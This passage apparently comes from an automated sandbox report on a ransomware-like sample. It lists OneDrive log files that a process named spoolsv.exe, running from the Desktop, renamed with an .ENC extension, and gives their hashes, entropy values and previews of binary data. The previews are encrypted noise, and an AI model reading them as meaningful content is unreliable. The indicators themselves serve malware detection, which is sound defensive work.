                                                                                                                                                                                                                                                      SHA-256:8276240777D2B7027290E85DA508093508040EE8FC4362EEB30A9994F937768C
                                                                                                                                                                                                                                                      SHA-512:78BAB626A645187A4BBCE84EFFAF7CB84AD3C1D5E05A294F24A0DDC0A98CA396DEA4D3FD313A25739C82D59355CC7065369097981AB0D7A4EF24408381C2FB9B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...pO.........KG.....I9...`...jr....3.Fg..p^{x....R.X..(..;....Te.H...M.V.y.h..gH.\L...!?...G.X..F..q.i.S...>.......i....x.J(1...^.o..Z=w...&...\.U....SH..2.h.....'u...._H7.e+V...Jm^...\}m..h.>|Jz.X..-....N..i. ....X/"..O.l..F...d.(..M..3..`B.RhV..uA...5..^.......Dn.j...Y.S_.A.8%......'v\......y!..K...3...d...../rNg...x....i....F"-a.n...Ngks.@.*........&h.]^R...0.G...S.U.mT.....r)...r.;...|K.c.k...h...M7...-.(..4..G.D.*<...Y......q.e..h..a./..%6..kZ).M.-q.~.U..F.2.,.t..|Z.$..H.rT......!.Q...}..h.... Ip.wU..J..c.C..V..A.....A..D.......K......2..K1@+....~.Q.f...=..I..?.d.!..n.....(.....R....c.U....q....}I.m..=......k.Z.Y...........:...^....x%.\|.....d5..y...S...e.,IA..F.]&./.9...u..V.R.}....7...Df.D.....`uMon..&L..m.A.....N..o .=c..G.1...$...d.q.]2.....t..X[..vz~..E.q..].@h.m.T..q..ff..(]...;!..d...0..Z.W.cJ.}@....%..^v..T.W..d..ua....?..NbF...Pw.cj1\q..\.D..6.O.#..<.\!....ZP...bA.SK...7. .|@...`+...:8 ..l.....<..9`:.e&..i.....1..&4._6..m....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.0741.4416.1.odl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):2.84893331034059
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:KhQ7Pi10xIqQ+6jDnKR3Zwzf2tR+xJ3Zehxi05DppNuV:KMPi2xIqQ+63KgyYJpCx7DpPuV
                                                                                                                                                                                                                                                      MD5:35EA44F61CFB7AD73F238F0AC49BA7C2
                                                                                                                                                                                                                                                      SHA1:351666B3FC1F81BD8781188D20F8565C55B92F2E
                                                                                                                                                                                                                                                      SHA-256:ACA8622CC7D9F9C4A7C6A2D18CC1A236D0FE46C1194703DD80960C95F149215D
                                                                                                                                                                                                                                                      SHA-512:D9A9E21F701AD4306A3B6DD3F293B04ADCEA55CF3906CB180580D4FA4A4C269AFEE09BA2C09CA048A12BE652C6864555A8FAB61E52F5CE18E0412BFE3FF40F27
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...pO.........KG.....I9...`...jr....3.Fg..p^{x....R.X..(..;....Te.H...M.V.y.h..gH.\L...!?...G.X..F..q.i.S...>.......i....x.J(1...^.o..Z=w...&...\.U....SH..2.h.....'u...._H7.e+V...Jm^...\}m..h.>|Jz.X..-....N..i. ....X/"..O.l..F...d.(..M..3..`B.RhVBY..,._fADd.....&..I..NS..j.i... ...$i.....h7%.n..I5.....d...{n.c........T....s?..N..Q....l....s...b.MR...y>..z.s....c..r..e....6....,.R...........3.>.p........S.f.+_....G..+..'F....`Y3.vD.f.u.![j\!.b._.~"....Y.L..W.(%{k.k.)2.=).n..>..c..`".g...tp.....p.y.z.b..b...C.:k|..&.:Q..I.9i.'.b..zzt:....l...h.<.+&~....r<Zu.c.GL|+.Q..<....[....F{"..s.b...#.%*t.&.g....n.D.....$|...?0bj#...7.dx..d..ze.r&./J....|.j..E..B?.i..R..-..#W@.t8..Q..S....W...{...q.l:....Y..^.82G.M...B.D.M.&...[.6..'...s..5 ..]H......9.|.Ew>z.A...R.A...V3...E...M1u...........Js.]>.J. Q..H.j.......N.....c<......K.-..|..r..9X.,.....-}.~.2D...(.<./ig.XC.mI......gO....Mt..;..<.I..[..0.o....&.L~[.g.)..iZ8Av..\.4D2!...a....._..:...^.Q.,..4......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.0741.6944.1.odl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9859370666477901
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:+VxAk1Vy+ovMHQ5TluXm87nnGQlVqaXXV+E:+jAQuMHQ5TQXm8bGMq
                                                                                                                                                                                                                                                      MD5:02777306601FF26CCFDF68C2C5B1BD3B
                                                                                                                                                                                                                                                      SHA1:5D2070775955B8B0D9718649EBE60EBCAD289008
                                                                                                                                                                                                                                                      SHA-256:2EA4632F80FFE6EA66C1F0622DF6663F9E6C9159E6A0FF78DEBECC36A340B05D
                                                                                                                                                                                                                                                      SHA-512:1ADB505ABB02D66CF53368D629DDC4FC570B37A56B9F5AC14E8740ABDBE1011D92BB83FDC549BB37B3287DC5BF2FC9F5C517DC3F12EFECBC0B822793CE915524
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..Vn...iz.P...I@{|.'.z6.U......aI.Sw0.r.=.h6..0!.X7.r.C...]TK..i./SsX.......G..\WjYc...`jM. ..o.zy..n............TP.5.&...&7.;R/6]Tr.y.....i.._/X......8.+.B..[..A..-&...>q.J...I..S...X.R.....L.~..X.1.<....P<...|.2.!h.R..6P..'....<?.~..#)....@..Zj..u...~.a.....@......R.Mk..a.=3.:. ...UZ....U...9g...X....sq>.{.L..*m......."Y..{y....I.t2..t...?.".x[Q.d {e......g.M....eH...R.W.3t....KJ..k...k.H...T*..W...f&.}.R.|.:N.G..f.+.........R...;udM.%{p.&..].9.W...[..{!.l...Mk..?....Q... ...Kh........./`k9;xNk........qE.V..UvKJl.I...f..Z`"..Z>..\.<_4...Ac`qeP...o:.."........8e.|}$.U..M..R....E.W..{...?.d.%.t....~lx.B..^u....i.H......y..y..r`xWC.D..@.0.?...,uj:.I..^K@....O.Y.......V....Oo..H....=...YE.>F..M.L.X.C....B......@*U...Y...6...n]`s'..G^..@.Eo...c....-.4.^...|...z..OoY-..s.oYo......./fI.).(...T0.d...l)b...y.r..N.n.cT.......A]...h.%Y.M...q_e+......f)\..\:.W\..i..gi.......?SH#.<...,.|QT.-1...Z:x..$.....`4..H...#..s........y......5.y.7.....,C....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_074102_1b20-118c.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):4.63410567719449
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:oXEHG68a8qeO7yitGJaiqb9AVEdyg+Osm/wr:xAaVeO5GJMbcEgZC/
                                                                                                                                                                                                                                                      MD5:69988DCFEEC64765300F72358D3CDA4B
                                                                                                                                                                                                                                                      SHA1:5C592543945815CBC4DFD06D3B62547E4F885E34
                                                                                                                                                                                                                                                      SHA-256:D72BB040DC803A249573C03C832BD04BBF08E5BC43C5D410B94290A38BF6EEE5
                                                                                                                                                                                                                                                      SHA-512:822E957942A3FFD0FC7390BE4AE769BE6C3D4499D3E75DF399BFB05D39F2135096D95885FE4C17E86FF97EC9A988CB387949B606C8EE169924686991B78344BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h...B7... 4.{.h.t..>..g...QM......pr7,.3..Ul....-[....K.....ej...l.....{`.......y?.n..d......w.D....y.3av.<.j.n........J.^..8.\..u9..y2'.G..).....i*............D.kV.y.i...RK.jD.E)[..l.t.V.......L.+.p`."....U>..,@.V..*.>....E.J.2`.4..$...$.D..l"4B....t...h.?.5.y8.mU.....A....w.."..9. G.......k...b......a.._....]...8..?3B"s...I.N..."..,p._\......Z.>.X..|..=..H`3)9....E....8....CV....MI&R.3..W.. .o.N8#.,...H1...9....X'-.3O...8.Xxyv....]............n[/Z..@Xp.B.....H.B.....|j.....32.5....c..f......B..v...]..[!..=M...>"#...bP.!*<J.....<..O.F..5.<H.G..*8....d.~..F.y,.R...T6 .~l.yP:......'.S....0.1..AG...c....|.....#..%.N..Y.....~....I..nm..gt0y)..Fz*.2..........`.m@..-J.-.cJ.3R.....c..#..jB..c.b...N...Uu......:.2...^.n....V..k...<.Z..Q!......_.U...L.-..y..O.h..=T.O.N.......F_..p...-.......".Z..M....#.x{......C%....y.lc...s.}...bl.nz2.7.h...GD&.......\..^..AeL..1.fu..y..{\..JzR3W...<.'..e.H...4@.....'.a.*...m..B..R'Vn...|S...E6.?....=f..v

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_074135_4416-8684.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):4.593641125000881
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:GI907hr5vNBX6RsRfz1gL5cqr7TY7ImnLoPxaa04sQVZ:rahrt/RfZU7rwlLoPxaa04s
                                                                                                                                                                                                                                                      MD5:A2705BF68C24C4C974F5924E460F977F
                                                                                                                                                                                                                                                      SHA1:1E418F13C96E86D7128A2A2131DCDB10E3079BA5
                                                                                                                                                                                                                                                      SHA-256:2055A47D42F3ACD9D9085624CA7F2151856422926E8A739C55CE24134023F412
                                                                                                                                                                                                                                                      SHA-512:3BD5C68B639F345300E04FB0B3AF56B6EEDB1ED5E876380CC98F5221728A400FF9D70E2AFE41CFF950C6151C95A540F6EF4334284ACDEF3A55B2BEBECFBEEAA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h...B7... 4.{.h.t.w.P...3.>.).....h.Z............D......pP...$..W....f.F.,...:>#M\.r}'......;......T.H.h 7.0.........O+..=.9|....o...#=..Y...]..|X..Y.y(.....bB1ub5.......6.....l........v.i...RN.*E._.2..ta?...yqp.>..#"...he@.2....f...:.AL..fs.nb1g.V5.67e.}q.^*./.^....1{Uq. .W[".A\...h&....B.[..x..d@.....k.a(.r.:d.../n,W".~...j..`|$p....6..7.c[...6%....!cw. .C..f..w.evf....Q...D@...?).!.Gv...5..#....9L..RQG..x...<..D.x..c..F"R/. .j"0].d...!3..i%.^.;ay.G.........8..H....@....Wu*..6.fv.....i..n/.<>....).\.T#........^..v.@.{.Tp.....~.V6X<...Z...QZW.2.p.zN.P~....\........*....0....#+.......:.E......<....t.9....u.N...LdV ....."kM..k8.^.,.)..=......R....M..SDI....`.&.0.....r'.N....xb...k.|~..'.|l.$'.,N...).TB\....V...H.u.....t.....E....P.....H..EeGM...eA..7Q.z.q...tw0.X... ...2.Q..).}QBZ....#..'A2'{u.Q7.{.x.3z.b..G1.W.....!..ty....Y..C1."..w.....P.f.......@......s.;7..$.x...'..._5..@..*.mJ(.&...[...).....1.z.ZK....-p.!.;.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_075132_6008-6584.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):1.5307978421367674
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:7HVxgP5hw7bdHkIrwa2TxJLkw5brXg7rHnguxgT5isdlbkZwGm:bEHq5EaD2Tx7HWn5JBwGm
                                                                                                                                                                                                                                                      MD5:867593CB0CC96C17BB7D1B040C166D4A
                                                                                                                                                                                                                                                      SHA1:FDC003C6CDDE6D928A048C24CA46150943CB33A6
                                                                                                                                                                                                                                                      SHA-256:5BE59BB90BE5BDF9F0688EE0B5E9419C3CFE18E64B8FE15B0A11A8F01CF69001
                                                                                                                                                                                                                                                      SHA-512:1A1903D125B3C14AE0E0526EEC911F81472C3B6DC670DD0DED3A16BC50C81EC80151FEF40DF1E5ACBE8E12C11627C9CEAFD169FEDA0CB513F0324B928E34617B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h..DU...HOu:..-...p..\.i.'n{0.t.@n....f.R.@.....SKKx.h:p........8.m..$.qm.....`..qL...'@/.=b-7d.5..lrm....f.n.."TJ.@.lh.....%...J...a.......T....)....q....v&..wD....x....".....;._.,..az.....W.T...."@...q*.....(5.............'3|.|).J...dx.AE.....>QBD..g...;D5.:..,..qT..0~.=U.f.s!R..J..Tz.2i...zu.m...........H....U9\rSv#U.=9+..S...M....V.Gk^y.;t|.......n.(L.sC...l.c..+.{...;..~.`.fp72.a...^K<.).>#.k..X.%...:..`.'..(!e..S..S1. .W./.d..%.r1..b.a.......}.h..T..E.._..#...bd..L.......6.c....U9d.h~>...,.......".;.v5.k)....t......g.. uq<K]0....v..dL .&..C?....i..'o..J{.....;t@....F..k......../u.e........1.b...U5c....?....n....d..D...T..$.9[Z...0`+...=Rq...O.gW.q.E8.6.0#@',",..k..k...u...T.....i{..k.K...|.h.8F..'....&..N+..#=.8.......*....).{..Y...5Q71nw.5C..A...3(..Y.=(.....<..M.a.H../..K>....Q....322$.....U.y==n4..M...G^..(.........)U....W.>...u.h.....h....Kk...4...hN.e..u,hG..U.x..h]LO.=.d....n0......7Z[.(.!..d......G&.g..z#.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-05.0750.6324.1.aodl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9088855162444142
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:+DX1+INXQB69PD5lHwm9hZ3uOqroApchd2xEX58ZFHt+qa:+DX1TQCPDgmTQroAW6WJYRt
                                                                                                                                                                                                                                                      MD5:F7D6DAA581F54ABD45F91ABA58AFAE8F
                                                                                                                                                                                                                                                      SHA1:639ABB035D662A638945461F18FF71FAB617B0B6
                                                                                                                                                                                                                                                      SHA-256:A3E80C021829AA539320D77BA9342CD98157D715C4332C4BFCD5442CA8E810E9
                                                                                                                                                                                                                                                      SHA-512:8E7157AB50C04A68B3F38707BF83F86EE2D2D865CED20C6A37F51F1FDEC5FD469E8D7750030BA39EE6ECF0EE1BC50813A0B9A5A81AE4C41A3726A12B827E3925
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..Vn...iz.P...I@{|.'.z6.U......aI.Sw0.r.=.h6..0!.X7.r.C...]TK..i./SsX.......G..\WjYc...`jM. ..o.zy..n............TP.5.&...&7.;R/6]Tr.y.....i.._/X......8.+.B..[..A..-&...>q.J...I..S...X.R.....L.~..X.1.<....P<...|.2.!h.R..6P..'....<?.~..#)....@.....Jtv..o.. ...g.W...~..D.{Y.7.N..%q.j.....`..OQ.`,.!.Q=...5...0..)zi.8x.*k....z...O_...n.(94...=.8W.I~...{t........OD.]Z. QW.Dq`)O.I.8...l..V.<.f..2R.fo4I$.U..QS....@.H....)Ha..2........0N.Kn..........~...cW...".a........<;VY.]T...-... .z...#...c.S.....4....{..J...d..oy.............RmT...TR.'..~R.p.....V{...z.... ......[N..4..QdR.Wj..`VN...f.n./Q..5....X...=...V.I....Z...f.D...T:n......Cqq.......|z2..........jq'..D..4.........O_.\(;/V.R.....%.X..... ..b....).)....t......^..E..k.....7......2).}.24...._-.".5)lzO.x.h..s.....p.Tg..9<;.1r.3..]Du...x{.v......,.M..3.W..?9...(C[.~...V.]....1..5d...r.nK.}.7..Q. M...S..d........&.Z.a.."..W.u}...l.|).c.c......G....D.a.j....!s.}).F.B"M6.0.m..\\..k.)?

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-05.0750.6324.1.odl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):1.509228475295001
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:+nVAPZcoFSlOUvlp5Ksaou8mRMDbuv8Epq2sI:+nVAPZ/wlnz5iou8pPuDt
                                                                                                                                                                                                                                                      MD5:D8EEB997C78053F01BC1955B40C7B9F7
                                                                                                                                                                                                                                                      SHA1:6A0B2A0A5B7002D82B72F5E4ABB50CB109BDA667
                                                                                                                                                                                                                                                      SHA-256:1FA01811369F7FEC474C4BD7C48486C69B48ACDBC3CF8015D32B9900CC2656F8
                                                                                                                                                                                                                                                      SHA-512:E23E128B131AB935A4A2A119CB9C3CA5C97AF9FD9A40A45368A8D60C219E2ED5E66445CD960A94D23EA115D66B5BA3389388097AF9996C4D6CEEBE7D46395D4D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..Vn...iz.P...I@{|.'.z6.U......aI.Sw0.r.=.h6..0!.X7.r.C...]TK..i./SsX.......G..\WjYc...`jM. ..o.zy..n............TP.5.&...&7.;R/6]Tr.y.....i.._/X......8.+.B..[..A..-&...>q.J...I..S...X.R.....L.~..X.1.<....P<...|.2.!h.R..6P..'....<?.~..#)....@..KY....#..H=R...e...2.VL.B2.`..1.W...k..<..BK.B..~.._.o.D.[..)T..9{m.....4.....u..p..M"....!~N...6m.;.Nc...*.......(...F.+dN.`.~.(.w.CeQHD.ge.._BM.~.:E.......g....e.'.u...t. ..*.,...f..Du.z`...<a.... E\-|.T.r9..G2.+V..%..SMBh~..._.E....H|[j.....>.^.p2t0..|#n. .3.K...T./..E.G....=..d...F...z{..D....2...'D.>F.....Gl.?...`..@......).-.T.....$..p..f...*Q.A+4{K9O.F2.;0.....{....>+..<......JL..."#.z....j.....P.(.(^.4....X^[."...Sa..s?.7.m..5..U.........H..n?.....Z3D..U. ....;WQC.WI..r...l...Z....e.w.G...>S...a.G..x)9%.Ic+.;V.....z..L........)..a.0.i..7a...eB..{y...L.v!.L.t....:7..Ne=.E.`.EM).-.....w.I}s......>D...?.:Y.J>......y..K~[.%#..*.-.w.....?..Z%r.....vU>T...x.A..~..{;.=..c....q8....\h.w.>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_074114_1004-7e4.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):4.519246857231968
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:mMHkbtCDf/M2sMHxyf+Vea3inmfVyfOeSCZY8G:hHKtCr/M27UWVea3inky1N28G
                                                                                                                                                                                                                                                      MD5:B52747D63BFB5C9FDD7106CCE5B844C7
                                                                                                                                                                                                                                                      SHA1:41AB8D68B9A6CDE6136472DE585F84AAB4E4DDF1
                                                                                                                                                                                                                                                      SHA-256:7549B690A0F220D55798A0353AA737A219A07277DDA59A2260D6C1CB999E3627
                                                                                                                                                                                                                                                      SHA-512:42F93F8B80FF50FCC135E7154598ABAE09E4738DB563B6C35C2E6E13DD5A29784070B1D4F223B3992B44307B0B649C61386DB527D4A4EA6D29B663B3671276CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h...B7... 4.{.h.t...P...j..3...Y...D|......&{.....9B=2..G.-...t..@..n6=..g;Z..vV.m.4.(.x.....x.LV2j.hn&....s.'%4.!.}.t..N...K...+...".b..O!..g.&h..:`.!,.h..=.}..W....>a...b....H........L..O..-.h..|."].....)..MWc.3e....p../rn...e6.;.SJ@4d.....1.....{.z..zr....?.3R.m..cR........z..k?....S...Le....G.V0..J..bF.|'..l.u|.t+.#.......i..C.W..K......=..q.wJ....%...w.n..D..!...i...!.x*X.G...^...U(3..U...4....sG...k.c.f...K6.[.......p...A.#.m..].D...y..C..7c..g..nTh...^..V.m.v...K.%...KIEf...Z482)d...B.b.....S]....1.. mo.@."T.z.#...Dp.{7..4./.V....x.;..A.5U.....:)...c..Rl....A..7..,.O.G..^"T@=C.y...R....r.qb.X^..$..._.}A....x....U...8..>G.s!V...e).&...G....u....)........-.X.6..'....H.2|.4...#....j.,.l..i....7.g.c..Oy.r....jGV.RO]....B..kB./.F!...?.....f..Q.....k..d....a.....<..h.1.Pl...&...W...N.......8..... ...}.s........].q......>.GCY(..C...f1b..Bc..}....x...z..X8..).........VR`......%.k.Pn...<.b3).d#.;.S....k..-.k.h-.t.....x..... .c.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_074148_8752-8608.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):1.2603510758100542
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:hkJOIeRmlzSdJO/Ahoy2dFIPT/7a7Pnepv+TT/XP:hkJOW1SdJQAhfrja7/uWP/XP
                                                                                                                                                                                                                                                      MD5:8724B1E28FBFE8A261335FB155B3EFA1
                                                                                                                                                                                                                                                      SHA1:6D810EEAED081C61A8DA92626EE94C1C598A4195
                                                                                                                                                                                                                                                      SHA-256:BB5D7DB00FAD2DC1B1F6E1376237B20873C6848875BD5AD7FB10D196A1AB5574
                                                                                                                                                                                                                                                      SHA-512:770E04C9FBD46D2A2AA8B452C3C5CFAF602D15136AD8F83CA2B61690EC1C8AB8109846A2C2AEC63B8E81991781D5BC3A8C8EEF0873F7493761D18A657DA11E4E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h...B7... 4.{.h.t..^D...=.{.[?.y2......z..V.u.}I....F.St.9.$5%g08...or.!J.kr..X...s....a...N..}D._'.'..T.+.,.H.Is./_....-..F........D.%1.....!..\.@6.-.B-Z1.0......)<Y...M#T*]...@.Ir..."Y.$...t.^...W.........X...*.....T_.+.._...k/...../T..j.qU.....i...Z..R..:..D.X((.......=.b...+_..ef.a.....EY\.....hG.!..X3.U.]n..1..v.5...8.<..1@u.r.C.n...1....#.vQov19Qd.Pv..w|7U~.2....g.G.Ye..1.'.Gj.622..>..jC.@.2..]St..<..0..at>....~E.xe......f;.nWv...&.K.nd.@......X~ik.....8 zqI.l.-...A/3M..UV.P.L3.*.....G..{H.....h..|...z.Y.[...3........P.a..P.1z(..[.%!.k...]X...0S..EkU.4.....E.8..q....3.....r.3...... .y..).}M&J.".jw...F-~.8...*..=..HCX.V..\.._r0....n..>\dO.=...cqMl...V.,."Ed.1;./...eaz...u^.f.Gk.v.l.s..vZ(:.w..p I+T..V.............W{.}6k.*.o..~.nB/Ce..p.\..+..SO....!>...[...*.s..}a..&_J.vuo9.7p...-....Sl\.l..3.Vg.MZs.....0Z-7.j1i.,..-..z~....yD...&:...f.qD....u@IB.A78.g..&`.vx....q+%4'8f..'.D^}.n-..?;.].2<.1l"+ .Rp.R...W.0.[-z.}.0.wW.......O..+

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_075033_7632-7636.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):2.711774805366855
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:111+eXZsedetJRyHzJwn/F9y28M/yPo67Wqh1n4:1115jeLR0a/FABMO7/Y
                                                                                                                                                                                                                                                      MD5:4BC9C4A072E72B2E0174A158B09FC2C5
                                                                                                                                                                                                                                                      SHA1:FBF645DA7D002678C4D58DC9C99F1B8CB12EFE01
                                                                                                                                                                                                                                                      SHA-256:9FC3A764B0EE746CB1B261D4EC71D437DAB4D7514935299F4EA62DC248D3E814
                                                                                                                                                                                                                                                      SHA-512:2BACC5CC96D90CA4F31F1407D36A1F13712293FDCC64EFC91AB51F564BD1BBB032F5D2140CD01027BABDCFFCFAC2EB1BB2DB5B6291EE5BE20AA10E5E5BB94232
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h...PP.=v_..J...n8.@.C.9..F_w...$<..N..@.S...Q..@`8...|E5...5..H.........5W.".-..v.g$.-.S.m.MWVW\.j.b.E...P....@......5Lv...H..H.z`&*....'..d.K......8N5n;..f.c.....+...i..\OC.H......4..t..h6.I.{...&...{N.0.H..eU...$q....A).f....n..%.C..w0."..`.@.;.W)........Ke5.E.p?.....k..d....9.f.}>juK.W..........*:....O..q.....(..........@Q...7..h.h_:...%...7.A...-9.N..Hy7..y..?-m....~....).`....n.,z#Ff...lv..Vy.z..g\.N[.S.X.4v...E....S)I.Qi.\...]v.(I..ak..r.(.h...P....Zd.y...N.C.....z$....\7.....9...V|[.=....F.xI...\ p...4.....A...M}.<.3.r....u..U#a.G.R=...J=.....X_.~..]".?.7....GK..b.....?PTv......x)i..+.._....a.Dx....%.B..=..Jb..C.....c....8...T..".JFM..>&@.8.o.@.3f..DC....>(..r...K2.......7...t...ROvi....Nf.Xx.U.6.....]t..`\T..sZ...&.tE....|..../.*.,l&..H.<4......,...2.*.WJ....K..wK.K.8,l!5p.d~....{.8v......l..N.h..*.ZI.#7'....u@.........a.x...ek..i.2.t..B..[....{...}..'....r..g.`cG.}8.,.......z..m_.3...W..q.&.<.........7.rw.3...z.".

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-05_075125_4700-4672.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9499824406153901
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:FMXR4zg+MhfJt52j9yQU1gG9sJBMeG9rEc:FMXag+MN8j9dU+F3MeG9
                                                                                                                                                                                                                                                      MD5:0B4ED27BF713D3D012094457184D125E
                                                                                                                                                                                                                                                      SHA1:52B0D6D0D6C8557F4907014225F47F670346520F
                                                                                                                                                                                                                                                      SHA-256:D095CDF3558D238CBE72E3765632DFCEDBDCBA156D3EE46140BAC0D534E296D4
                                                                                                                                                                                                                                                      SHA-512:3CEF22D6A5BDED1942F24A2F478FCA06285A6F4D4B5B409A24402856C8DD293411390ED9F55FF9E29677F740E435B48BA89E4853B6FB6304EF25161E54927FDA
                                                                                                                                                                                                                                                      Malicious:false
